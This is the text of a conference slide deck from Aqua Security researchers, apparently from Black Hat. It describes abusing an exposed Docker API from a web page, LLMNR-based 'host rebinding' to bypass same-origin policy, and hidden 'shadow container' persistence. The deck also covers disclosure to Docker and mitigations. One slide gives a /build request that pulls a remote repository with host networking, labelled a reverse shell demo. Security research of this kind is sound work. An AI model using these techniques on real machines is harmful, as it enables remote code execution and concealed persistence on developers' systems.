SlideShare a Scribd company logo
1 of 102
Download to read offline
Well, That Escalated Quickly!
How abusing the Docker API Led to Remote Code
Execution, Same Origin Bypass and Persistence in
the Hypervisor via Shadow Containers.
Michael Cherny @chernymi Sagie Dulce @SagieSec
2
WHO ARE WE?
Michael Cherny
Head of Research
Aqua Security
@chernymi
Sagie Dulce
Sr Security Researcher
Aqua Security
@SagieSec
3
FOCUS
 Developers are the new Targets
4
FOCUS
 Developers are the new Targets
 Main Course: APT  Developer Running Docker
5
FOCUS
 Developers are the new Targets
 Main Course: APT  Developer Running Docker
 New Attacks: Host Rebinding & Shadow Container
6
MENU
 Containers & Container Development
 Attacking Developers
 Abusing Docker API
 Host Rebinding Attack
 Shadow Containers
 Full Attack -> Click 2 PWN
 Conclusions
①
②
③
CONTAINERS?
8
VIRTUAL MACHINES VS CONTAINERS
www.serverspace.co.uk/blog/containerisation-vs-virtualisation-whats-the-difference
9
CONTAINERS EVERYWHERE
 Linux Containers
 Linux / Windows / Mac
 Windows Containers
 Native / Hyper-V (Windows Server)
 Hyper-V (windows 10)
10
CONTAINER ADOPTION STATS
https://www.slideshare.net/Docker/dockercon-2017-general-session-day-1-ben-golub
11
DEVELOPERS AS TARGETS
 High privileges on their machines & domain
 Low security attention
 High Confidence
 Access to sensitive data
 Code
 IP
 Registries
12
DEVELOPERS AS TARGETS
13
DEVELOPERS AS TARGETS
ATTACK OVERVIEW
ATTACKING CONTAINER DEVELOPERS
15
ATTACK OVERVIEW
16
ATTACK OVERVIEW
17
ATTACK OVERVIEW – WINDOWS 10
Abuse Docker
API
Host Rebinding
Shadow
Container
Remote Code Execution
Privilege Escalation
Persistency
①
②
③
ABUSING DOCKER API
FROM A MALICIOUS WEB PAGE ①
19
DOCKER 4 WINDOWS / MAC
 Client talks to daemon
over via REST API
 UNIX socket
 named pipe
 ..or TCP port
 TCP port was default
on Windows 10
20
DOCKER 4 WINDOWS / MAC
 Client talks to daemon
over via REST API
 UNIX socket
 named pipe
 ..or TCP port
 TCP port was default
on Windows 10
 Abuse Remotely?
21
DOCKER REST API – CAN WE ATTACK IT?
 It’s complicated
 Same Origin Policy?!
22
BROWSER SECURITY
 Browsers need to display content from multiple domains
 But, one domain shouldn’t be able to read / write to another
 Post status in Facebook
 Collect underpants...
 etc.
23
SAME ORIGIN POLICY (SOP)
 Only “simple” requests are allowed across origins
 GET – can’t read response body
 POST – can’t send with a body / not all header types
 HEAD
 Not same origin:
 request has different domain, protocol or port
24
DOCKER API CALLS THAT DON’T VIOLATE SOP
 List containers (GET)
 Inspect container (GET)
 List processes in container (GET)
 Get container logs (GET)
 Get container’s changes in filesystem
(GET)
 Export container (GET)
 Get container stats (GET)
 Resize Container (POST)
 Start Container (POST)
 List images (GET)
 Build image (POST)
 Create image (POST)
 Get image history (GET)
 Push image (POST)
 Stop Container (POST)
 Restart container (POST)
 Kill a container (POST)
 Rename container (POST)
 Pause container (POST)
 Unpause container (POST)
 Attach to a container (POST)
 Get file info in a container (HEAD)
 Get filesystem archive (GET)
 Delete Container (POST)
 List networks (GET)
 Inspect Network (GET)
 Tag image (POST)
 List volumes (GET)
 Export image (GET)
 Inspect volume (GET)
 List secrets (GET)
 Create secret (POST)
 Inspect secret (GET)
 Inspect Swarm (GET)
 List nodes (GET)
 Inspect node (GET)
 List services (GET)
 Inspect service (GET)
 Get service logs (GET)
 List tasks (GET)
 Inspect a task (GET)
 Search image (GET)
 Delete image (DELETE)
https://docs.docker.com/engine/api/v1.29/
25
DOCKER API CALLS THAT DON’T VIOLATE SOP
 List containers (GET)
 Inspect container (GET)
 List processes in container (GET)
 Get container logs (GET)
 Get container’s changes in filesystem
(GET)
 Export container (GET)
 Get container stats (GET)
 Resize Container (POST)
 Start Container (POST)
 List images (GET)
 Build image (POST)
 Create image (POST)
 Get image history (GET)
 Push image (POST)
 Stop Container (POST)
 Restart container (POST)
 Kill a container (POST)
 Rename container (POST)
 Pause container (POST)
 Unpause container (POST)
 Attach to a container (POST)
 Get file info in a container (HEAD)
 Get filesystem archive (GET)
 Delete Container (POST)
 List networks (GET)
 Inspect Network (GET)
 Tag image (POST)
 List volumes (GET)
 Export image (GET)
 Inspect volume (GET)
 List secrets (GET)
 Create secret (POST)
 Inspect secret (GET)
 Inspect Swarm (GET)
 List nodes (GET)
 Inspect node (GET)
 List services (GET)
 Inspect service (GET)
 Get service logs (GET)
 List tasks (GET)
 Inspect a task (GET)
 Search image (GET)
 Delete image (DELETE)
https://docs.docker.com/engine/api/v1.29/
26
BUILD IMAGE
 Build images from Dockerfile
FROM alpine:latest
ADD mycode.sh
RUN apt-get update && apt-get install –y …
RUN ./mycode.sh
27
BUILD IMAGE
 Build images from Dockerfile
 … Build == Execute code!
FROM alpine:latest
ADD mycode.sh
RUN apt-get update && apt-get install –y …
RUN ./mycode.sh
Execute Yourself
28
BUILD IMAGE API CALL
 POST /build
 No body => no SOP violation!
 Interesting build parameters
29
BUILD IMAGE API CALL
 POST /build
 No body => no SOP violation!
 Interesting build parameters
 t (tag)
30
BUILD IMAGE API CALL
 POST /build
 No body => no SOP violation!
 Interesting build parameters
 t (tag)
 remote
 git repository!
31
BUILD IMAGE API CALL
 POST /build
 No body => no SOP violation!
 Interesting build parameters
 t (tag)
 remote
 git repository!
 networkmode (bridge / host / none)
32
BUILD IMAGE API CALL  REVERSE SHELL DEMO
POST http://localhost:2375/build?
remote=https://github.com/<User>/<Repo>
&networkmode=host
33
BUILD IMAGE API CALL  REVERSE SHELL DEMO
34
ABUSE DOCKER BUILD
35
ABUSE DOCKER BUILD
36
ABUSE DOCKER BUILD
37
ABUSE DOCKER BUILD
38
ABUSE DOCKER BUILD
39
ABUSE DOCKER BUILD
40
ABUSE DOCKER BUILD DEMO
41
DOCKER FIX
 We disclosed to Docker
 TCP now an “opt-in”
HOST REBINDING ATTACK
DAEMON PRIVILEGE ESCALATION ②
43
WHAT’S NEXT?
44
LIMITATIONS
45
LIMITATIONS
46
DNS REBINDING?
47
DNS REBINDING - HISTORY
 Carbon Dated to ~1996
 2007 Protecting Browsers from DNS Rebinding Attacks
 2008 Defending your DNS in a post-Kaminsky world
 2010 How to Hack Millions of Routers
48
DNS REBINDING – HOW IT WORKS
49
DNS REBINDING – HOW IT WORKS
50
DNS REBINDING – HOW IT WORKS
51
DNS REBINDING – HOW IT WORKS
52
DNS REBINDING – HOW IT WORKS
53
DNS REBINDING – HOW IT WORKS
54
DNS REBINDING – HOW IT WORKS
SOP BYPASSED!
55
WHY NOT USE DNS REBINDING?
 DNS Rebinding may fail
 Existing protections (perimeter)
 Attacker needs to setup domain
 $$$
 Maintenance
 IP Reputation & Threat Intelligence
56
LLMNR: DNS OVER THE LAN
 Name resolution over the LAN
 LLMNR
 DNS like resolution
 IPv4 & IPv6
57
ATTACKING LLMNR
 Requests broadcasted over virtual interface!
 Spoof LLMNR Replies
 Cached in the browser (IE / Chrome / FF) for ~60 seconds
 Skip cache in FF
 Delay HTTP response 0.5 sec
https://tools.ietf.org/html/rfc4795#section-2.2
58
HOST REBINDING DEMO
59
HOST REBINDING DEMO
60
HOST REBINDING DEMO
61
HOST REBINDING DEMO
62
HOST REBINDING DEMO
63
HOST REBINDING DEMO
64
HOST REBINDING DEMO
65
HOST REBINDING DEMO
66
HOST REBINDING DEMO
67
HOST REBINDING DEMO
SOP BYPASSED!
68
HOST REBINDING DEMO
SOP BYPASSED!
69
HOST REBINDING DEMO
SOP BYPASSED!
70
HOST REBINDING DEMO
71
RECAP
Full API Access: docker run …?
Abuse Docker
API
Host Rebinding
Remote Code Execution
Privilege Escalation
①
②
SHADOW CONTAINER
PERSISTENCE & CONCEALMENT
③
73
MISSING PERSISTENCE & CONCEALMENT
 So Far…
 Privileged container on the VM (Moby Linux)
 Access to VM filesystem
 Access to enterprise internal network
 But…
 Not Concealed: docker ps
 Not Persistent: VM boots from image
74
PERSISTENT AND CONCEALED
myscript
75
PERSISTENT AND CONCEALED
shadow
76
PERSISTENT AND CONCEALED
shadow
77
PERSISTENT AND CONCEALED
myscript
78
SHADOW CONTAINER – SHUTDOWN SCRIPT
79
SHADOW CONTAINER – MYSCRIPT.SH
80
SHADOW CONTAINER DEMO
FULL ATTACK
CLICK TO PWN!
82
FULL ATTACK DEMO
83
FULL ATTACK DEMO
Abuse
Docker API
84
FULL ATTACK DEMO
Abuse
Docker API
Host
Rebinding
85
FULL ATTACK DEMO
Abuse
Docker API
Host
Rebinding
86
FULL ATTACK DEMO
Abuse
Docker API
Host
Rebinding
87
FULL ATTACK DEMO
Abuse
Docker API
Host
Rebinding
Shadow
Container
88
FULL ATTACK DEMO
Abuse
Docker API
Host
Rebinding
Shadow
Container
89
FULL ATTACK DEMO
Abuse
Docker API
Host
Rebinding
Shadow
Container
90
FULL ATTACK DEMO
Abuse
Docker API
Host
Rebinding
Shadow
Container
91
FULL ATTACK DEMO
Abuse
Docker API
Host
Rebinding
Shadow
Container
shadow
92
FULL ATTACK DEMO
Abuse
Docker API
Host
Rebinding
Shadow
Container
shadow
93
FULL ATTACK DEMO
Abuse
Docker API
Host
Rebinding
Shadow
Container
94
FULL ATTACK DEMO
Abuse
Docker API
Host
Rebinding
Shadow
Container
myscript
95
FULL ATTACK DEMO
IMPACT
DEVELOPERS AS TARGETS
97
ADVANCED PERSISTENT THREAT
 Persistency
 Concealment
 Low Forensic Footprint
 Access to Internal Enterprise Network
98
SHADOW WORM
 Attacker poisons images
 Bad image spread like a worm in pipeline
99
ATTACK FLAVORS
MAC
• DNS
Rebinding
• Shadow
Container
Linux
• DNS
Rebinding
• Full Access
Windows
Containers
• Abuse API
• Host
Rebinding
• Full Access
CONCLUSIONS
101
MITIGATION
 Don’t expose container engine API
 Only allow authenticated clients (certificates) access to
exposed port (or block it via Firewall)
 Analyze Container Engine Logs (on development also)
 Disable NetBIOS & LLMNR
 Continuously scan images in registries
 Continuously monitor containers in runtime
102
BLACK HAT SOUND BYTES
 Developers are the new Targets
 New Attacks: Host Rebinding & Shadow Container
 Protect your PIPE: Scan images & Monitor Containers in
Runtime
Michael Cherny @chernymi Sagie Dulce @SagieSec
http://info.aquasec.com/whitepaper-how-abusing-docker-api-led-to-remote-code-execution

More Related Content

What's hot

Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13
Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13
Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13Zach Hill
 
Veer's Container Security
Veer's Container SecurityVeer's Container Security
Veer's Container SecurityJim Barlow
 
Container Security
Container SecurityContainer Security
Container SecuritySalman Baset
 
Docker Container Security - A Network View
Docker Container Security - A Network ViewDocker Container Security - A Network View
Docker Container Security - A Network ViewNeuVector
 
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDays Riga
 
Docker Container Security
Docker Container SecurityDocker Container Security
Docker Container SecuritySuraj Khetani
 
Container security
Container securityContainer security
Container securityAnthony Chow
 
Container Security Essentials
Container Security EssentialsContainer Security Essentials
Container Security EssentialsDNIF
 
K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practicesSharon Vendrov
 
Container security
Container securityContainer security
Container securityAnthony Chow
 
Docker Security: Are Your Containers Tightly Secured to the Ship?
Docker Security: Are Your Containers Tightly Secured to the Ship?Docker Security: Are Your Containers Tightly Secured to the Ship?
Docker Security: Are Your Containers Tightly Secured to the Ship?Michael Boelen
 
Docker Security - Secure Container Deployment on Linux
Docker Security - Secure Container Deployment on LinuxDocker Security - Secure Container Deployment on Linux
Docker Security - Secure Container Deployment on LinuxMichael Boelen
 
Cloud-native applications with Java and Kubernetes - Yehor Volkov
 Cloud-native applications with Java and Kubernetes - Yehor Volkov Cloud-native applications with Java and Kubernetes - Yehor Volkov
Cloud-native applications with Java and Kubernetes - Yehor VolkovKuberton
 
Kubernetes - Security Journey
Kubernetes - Security JourneyKubernetes - Security Journey
Kubernetes - Security JourneyJerry Jalava
 
Container Runtime Security with Falco
Container Runtime Security with FalcoContainer Runtime Security with Falco
Container Runtime Security with FalcoMichael Ducy
 
Practical Approaches to Container Security
Practical Approaches to Container SecurityPractical Approaches to Container Security
Practical Approaches to Container SecurityShea Stewart
 
DockerCon SF 2015: Docker Security
DockerCon SF 2015: Docker SecurityDockerCon SF 2015: Docker Security
DockerCon SF 2015: Docker SecurityDocker, Inc.
 
CI / CD / CS - Continuous Security in Kubernetes
CI / CD / CS - Continuous Security in KubernetesCI / CD / CS - Continuous Security in Kubernetes
CI / CD / CS - Continuous Security in KubernetesSysdig
 
Docker Runtime Security
Docker Runtime SecurityDocker Runtime Security
Docker Runtime SecuritySysdig
 

What's hot (20)

Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13
Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13
Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13
 
Veer's Container Security
Veer's Container SecurityVeer's Container Security
Veer's Container Security
 
Container Security
Container SecurityContainer Security
Container Security
 
Docker Container Security - A Network View
Docker Container Security - A Network ViewDocker Container Security - A Network View
Docker Container Security - A Network View
 
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
 
Docker Container Security
Docker Container SecurityDocker Container Security
Docker Container Security
 
Container security
Container securityContainer security
Container security
 
Container Security Essentials
Container Security EssentialsContainer Security Essentials
Container Security Essentials
 
Csa container-security-in-aws-dw
Csa container-security-in-aws-dwCsa container-security-in-aws-dw
Csa container-security-in-aws-dw
 
K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practices
 
Container security
Container securityContainer security
Container security
 
Docker Security: Are Your Containers Tightly Secured to the Ship?
Docker Security: Are Your Containers Tightly Secured to the Ship?Docker Security: Are Your Containers Tightly Secured to the Ship?
Docker Security: Are Your Containers Tightly Secured to the Ship?
 
Docker Security - Secure Container Deployment on Linux
Docker Security - Secure Container Deployment on LinuxDocker Security - Secure Container Deployment on Linux
Docker Security - Secure Container Deployment on Linux
 
Cloud-native applications with Java and Kubernetes - Yehor Volkov
 Cloud-native applications with Java and Kubernetes - Yehor Volkov Cloud-native applications with Java and Kubernetes - Yehor Volkov
Cloud-native applications with Java and Kubernetes - Yehor Volkov
 
Kubernetes - Security Journey
Kubernetes - Security JourneyKubernetes - Security Journey
Kubernetes - Security Journey
 
Container Runtime Security with Falco
Container Runtime Security with FalcoContainer Runtime Security with Falco
Container Runtime Security with Falco
 
Practical Approaches to Container Security
Practical Approaches to Container SecurityPractical Approaches to Container Security
Practical Approaches to Container Security
 
DockerCon SF 2015: Docker Security
DockerCon SF 2015: Docker SecurityDockerCon SF 2015: Docker Security
DockerCon SF 2015: Docker Security
 
CI / CD / CS - Continuous Security in Kubernetes
CI / CD / CS - Continuous Security in KubernetesCI / CD / CS - Continuous Security in Kubernetes
CI / CD / CS - Continuous Security in Kubernetes
 
Docker Runtime Security
Docker Runtime SecurityDocker Runtime Security
Docker Runtime Security
 

Similar to How abusing the Docker API led to remote code execution same origin bypass and persistence

Jump into Squeak - Integrate Squeak projects with Docker & Github
Jump into Squeak - Integrate Squeak projects with Docker & GithubJump into Squeak - Integrate Squeak projects with Docker & Github
Jump into Squeak - Integrate Squeak projects with Docker & Githubhubx
 
Kubernetes Story - Day 2: Quay.io Container Registry for Publishing, Building...
Kubernetes Story - Day 2: Quay.io Container Registry for Publishing, Building...Kubernetes Story - Day 2: Quay.io Container Registry for Publishing, Building...
Kubernetes Story - Day 2: Quay.io Container Registry for Publishing, Building...Mihai Criveti
 
Continuous integration and deployment with docker
Continuous integration and deployment with dockerContinuous integration and deployment with docker
Continuous integration and deployment with dockerpebble {code}
 
containerD
containerDcontainerD
containerDstrikr .
 
CICD With GitHub, Travis, SonarCloud and Docker Hub
CICD With GitHub, Travis, SonarCloud and Docker HubCICD With GitHub, Travis, SonarCloud and Docker Hub
CICD With GitHub, Travis, SonarCloud and Docker HubCarlos Cavero Barca
 
Develop with docker 2014 aug
Develop with docker 2014 augDevelop with docker 2014 aug
Develop with docker 2014 augVincent De Smet
 
Package your Java EE Application using Docker and Kubernetes
Package your Java EE Application using Docker and KubernetesPackage your Java EE Application using Docker and Kubernetes
Package your Java EE Application using Docker and KubernetesArun Gupta
 
Common primitives in Docker environments
Common primitives in Docker environmentsCommon primitives in Docker environments
Common primitives in Docker environmentsalexandru giurgiu
 
KCD Munich 2023 - Demystifying Container Images Understanding Multi-Architect...
KCD Munich 2023 - Demystifying Container Images Understanding Multi-Architect...KCD Munich 2023 - Demystifying Container Images Understanding Multi-Architect...
KCD Munich 2023 - Demystifying Container Images Understanding Multi-Architect...Robert Bohne
 
Containers without docker | DevNation Tech Talk
Containers without docker | DevNation Tech TalkContainers without docker | DevNation Tech Talk
Containers without docker | DevNation Tech TalkRed Hat Developers
 
Docker for Developers: Dev, Test, Deploy @ BucksCo Devops at MeetMe HQ
Docker for Developers: Dev, Test, Deploy @ BucksCo Devops at MeetMe HQDocker for Developers: Dev, Test, Deploy @ BucksCo Devops at MeetMe HQ
Docker for Developers: Dev, Test, Deploy @ BucksCo Devops at MeetMe HQErica Windisch
 
Docker Meetup Paris: enterprise Docker
Docker Meetup Paris: enterprise DockerDocker Meetup Paris: enterprise Docker
Docker Meetup Paris: enterprise DockerArnaud MAZIN
 
Apt get no more let Vagrant, Puppet and Docker take the stage
Apt get no more let Vagrant, Puppet and Docker take the stageApt get no more let Vagrant, Puppet and Docker take the stage
Apt get no more let Vagrant, Puppet and Docker take the stageAlessandro Cinelli (cirpo)
 
Docker 101 - Intro to Docker
Docker 101 - Intro to DockerDocker 101 - Intro to Docker
Docker 101 - Intro to DockerAdrian Otto
 
Bare-metal, Docker Containers, and Virtualization: The Growing Choices for Cl...
Bare-metal, Docker Containers, and Virtualization: The Growing Choices for Cl...Bare-metal, Docker Containers, and Virtualization: The Growing Choices for Cl...
Bare-metal, Docker Containers, and Virtualization: The Growing Choices for Cl...Odinot Stanislas
 
Openshift meetup Paris - 21/03/2018
Openshift meetup Paris - 21/03/2018Openshift meetup Paris - 21/03/2018
Openshift meetup Paris - 21/03/2018kanedafromparis
 
Dockerizing a Symfony2 application
Dockerizing a Symfony2 applicationDockerizing a Symfony2 application
Dockerizing a Symfony2 applicationRoman Rodomansky
 

Similar to How abusing the Docker API led to remote code execution same origin bypass and persistence (20)

Jump into Squeak - Integrate Squeak projects with Docker & Github
Jump into Squeak - Integrate Squeak projects with Docker & GithubJump into Squeak - Integrate Squeak projects with Docker & Github
Jump into Squeak - Integrate Squeak projects with Docker & Github
 
Kubernetes Story - Day 2: Quay.io Container Registry for Publishing, Building...
Kubernetes Story - Day 2: Quay.io Container Registry for Publishing, Building...Kubernetes Story - Day 2: Quay.io Container Registry for Publishing, Building...
Kubernetes Story - Day 2: Quay.io Container Registry for Publishing, Building...
 
Continuous integration and deployment with docker
Continuous integration and deployment with dockerContinuous integration and deployment with docker
Continuous integration and deployment with docker
 
containerD
containerDcontainerD
containerD
 
Docker
DockerDocker
Docker
 
CICD With GitHub, Travis, SonarCloud and Docker Hub
CICD With GitHub, Travis, SonarCloud and Docker HubCICD With GitHub, Travis, SonarCloud and Docker Hub
CICD With GitHub, Travis, SonarCloud and Docker Hub
 
Develop with docker 2014 aug
Develop with docker 2014 augDevelop with docker 2014 aug
Develop with docker 2014 aug
 
Docker Ecosystem on Azure
Docker Ecosystem on AzureDocker Ecosystem on Azure
Docker Ecosystem on Azure
 
Learning Docker with Thomas
Learning Docker with ThomasLearning Docker with Thomas
Learning Docker with Thomas
 
Package your Java EE Application using Docker and Kubernetes
Package your Java EE Application using Docker and KubernetesPackage your Java EE Application using Docker and Kubernetes
Package your Java EE Application using Docker and Kubernetes
 
Common primitives in Docker environments
Common primitives in Docker environmentsCommon primitives in Docker environments
Common primitives in Docker environments
 
KCD Munich 2023 - Demystifying Container Images Understanding Multi-Architect...
KCD Munich 2023 - Demystifying Container Images Understanding Multi-Architect...KCD Munich 2023 - Demystifying Container Images Understanding Multi-Architect...
KCD Munich 2023 - Demystifying Container Images Understanding Multi-Architect...
 
Containers without docker | DevNation Tech Talk
Containers without docker | DevNation Tech TalkContainers without docker | DevNation Tech Talk
Containers without docker | DevNation Tech Talk
 
Docker for Developers: Dev, Test, Deploy @ BucksCo Devops at MeetMe HQ
Docker for Developers: Dev, Test, Deploy @ BucksCo Devops at MeetMe HQDocker for Developers: Dev, Test, Deploy @ BucksCo Devops at MeetMe HQ
Docker for Developers: Dev, Test, Deploy @ BucksCo Devops at MeetMe HQ
 
Docker Meetup Paris: enterprise Docker
Docker Meetup Paris: enterprise DockerDocker Meetup Paris: enterprise Docker
Docker Meetup Paris: enterprise Docker
 
Apt get no more let Vagrant, Puppet and Docker take the stage
Apt get no more let Vagrant, Puppet and Docker take the stageApt get no more let Vagrant, Puppet and Docker take the stage
Apt get no more let Vagrant, Puppet and Docker take the stage
 
Docker 101 - Intro to Docker
Docker 101 - Intro to DockerDocker 101 - Intro to Docker
Docker 101 - Intro to Docker
 
Bare-metal, Docker Containers, and Virtualization: The Growing Choices for Cl...
Bare-metal, Docker Containers, and Virtualization: The Growing Choices for Cl...Bare-metal, Docker Containers, and Virtualization: The Growing Choices for Cl...
Bare-metal, Docker Containers, and Virtualization: The Growing Choices for Cl...
 
Openshift meetup Paris - 21/03/2018
Openshift meetup Paris - 21/03/2018Openshift meetup Paris - 21/03/2018
Openshift meetup Paris - 21/03/2018
 
Dockerizing a Symfony2 application
Dockerizing a Symfony2 applicationDockerizing a Symfony2 application
Dockerizing a Symfony2 application
 

Recently uploaded

Top Software Development Trends in 2024
Top Software Development Trends in  2024Top Software Development Trends in  2024
Top Software Development Trends in 2024Mind IT Systems
 
Fields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptxFields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptxJoão Esperancinha
 
Growing Oxen: channel operators and retries
Growing Oxen: channel operators and retriesGrowing Oxen: channel operators and retries
Growing Oxen: channel operators and retriesSoftwareMill
 
Streamlining Your Application Builds with Cloud Native Buildpacks
Streamlining Your Application Builds  with Cloud Native BuildpacksStreamlining Your Application Builds  with Cloud Native Buildpacks
Streamlining Your Application Builds with Cloud Native BuildpacksVish Abrams
 
Cybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadCybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadIvo Andreev
 
JS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AIJS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AIIvo Andreev
 
AI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyAI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyRaymond Okyere-Forson
 
OpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorOpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorShane Coughlan
 
Kawika Technologies pvt ltd Software Development Company in Trivandrum
Kawika Technologies pvt ltd Software Development Company in TrivandrumKawika Technologies pvt ltd Software Development Company in Trivandrum
Kawika Technologies pvt ltd Software Development Company in TrivandrumKawika Technologies
 
Enterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze IncEnterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze Incrobinwilliams8624
 
Your Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
Your Vision, Our Expertise: TECUNIQUE's Tailored Software TeamsYour Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
Your Vision, Our Expertise: TECUNIQUE's Tailored Software TeamsJaydeep Chhasatia
 
How Does the Epitome of Spyware Differ from Other Malicious Software?
How Does the Epitome of Spyware Differ from Other Malicious Software?How Does the Epitome of Spyware Differ from Other Malicious Software?
How Does the Epitome of Spyware Differ from Other Malicious Software?AmeliaSmith90
 
Sales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales CoverageSales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales CoverageDista
 
online pdf editor software solutions.pdf
online pdf editor software solutions.pdfonline pdf editor software solutions.pdf
online pdf editor software solutions.pdfMeon Technology
 
Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...
Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...
Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...Jaydeep Chhasatia
 
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.Sharon Liu
 
Why Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdfWhy Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdfBrain Inventory
 
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLBig Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLAlluxio, Inc.
 
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfTobias Schneck
 
Watermarking in Source Code: Applications and Security Challenges
Watermarking in Source Code: Applications and Security ChallengesWatermarking in Source Code: Applications and Security Challenges
Watermarking in Source Code: Applications and Security ChallengesShyamsundar Das
 

Recently uploaded (20)

Top Software Development Trends in 2024
Top Software Development Trends in  2024Top Software Development Trends in  2024
Top Software Development Trends in 2024
 
Fields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptxFields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptx
 
Growing Oxen: channel operators and retries
Growing Oxen: channel operators and retriesGrowing Oxen: channel operators and retries
Growing Oxen: channel operators and retries
 
Streamlining Your Application Builds with Cloud Native Buildpacks
Streamlining Your Application Builds  with Cloud Native BuildpacksStreamlining Your Application Builds  with Cloud Native Buildpacks
Streamlining Your Application Builds with Cloud Native Buildpacks
 
Cybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadCybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and Bad
 
JS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AIJS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AI
 
AI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyAI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human Beauty
 
OpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorOpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS Calculator
 
Kawika Technologies pvt ltd Software Development Company in Trivandrum
Kawika Technologies pvt ltd Software Development Company in TrivandrumKawika Technologies pvt ltd Software Development Company in Trivandrum
Kawika Technologies pvt ltd Software Development Company in Trivandrum
 
Enterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze IncEnterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze Inc
 
Your Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
Your Vision, Our Expertise: TECUNIQUE's Tailored Software TeamsYour Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
Your Vision, Our Expertise: TECUNIQUE's Tailored Software Teams
 
How Does the Epitome of Spyware Differ from Other Malicious Software?
How Does the Epitome of Spyware Differ from Other Malicious Software?How Does the Epitome of Spyware Differ from Other Malicious Software?
How Does the Epitome of Spyware Differ from Other Malicious Software?
 
Sales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales CoverageSales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales Coverage
 
online pdf editor software solutions.pdf
online pdf editor software solutions.pdfonline pdf editor software solutions.pdf
online pdf editor software solutions.pdf
 
Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...
Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...
Optimizing Business Potential: A Guide to Outsourcing Engineering Services in...
 
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
20240319 Car Simulator Plan.pptx . Plan for a JavaScript Car Driving Simulator.
 
Why Choose Brain Inventory For Ecommerce Development.pdf
